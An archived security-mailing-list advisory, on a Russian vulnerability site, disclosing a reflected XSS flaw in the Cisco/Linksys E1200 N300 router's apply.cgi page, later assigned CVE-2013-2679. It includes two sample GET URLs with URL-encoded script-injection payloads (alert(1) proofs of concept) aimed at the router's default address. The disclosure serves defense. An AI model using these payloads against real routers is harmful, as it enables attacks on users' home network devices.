Информационная безопасность
[RU] switch to English


Дополнительная информация

  Уязвимости безопасности в маршрутизаторах Linksys

  Linksys X3000 - Multiple Vulnerabilities

  CVE-2013-3568 - Linksys CSRF + Root Command Injection

From:Carl Benedict <theinfinitenigma_(at)_gmail.com>
Date:15 июля 2013 г.
Subject:Re: Cisco/Linksys E1200 N300 Reflected XSS



Mitre has assigned the following CVE for this issue:

CVE-2013-2679

On Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict
<[email protected]> wrote:
> Summary
> --------------------
> Software  : Cisco/Linksys Router OS
> Hardware : E1200 N300 (others currently untested)
> Version   : 2.0.04 (others currently untested)
> Website   : http://www.linksys.com
> Issue     :  Reflected XSS
> Severity  : Medium
> Researcher: Carl Benedict (theinfinitenigma)
>
> Product Description
> --------------------
> The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch.
>
> Details
> --------------------
> The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful.
>
> Sample URL #1 (HTTP GET request):
>
> http://192.168.1.1/apply.
cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%
3Ealert%281%29%3C%2fscript%3E%20%27
>
> Sample URL #2 (HTTP GET request):
>
> http://192.168.1.1/apply.
cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%
69%70%74%3e%3c%73%63%72%69%70%74%3e%
61%6c%65%72%74%28%31%29%3c%2f%73%63%
72%69%70%74%3e%20%27&change_action=&submit_type=&
action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_de
vicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp
_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&
ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dh
cp-
tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&
mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan
_ipaddr_3=1&lan_netmask=255.255.255.
0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_t
mp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dn
s0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wa
n_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&
wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&
wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1
>
> History
> --------------------
> 04/26/2013 : Discovery
> 04/27/2013 : Advisory released
>
>
> --
> ?



-- ?

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород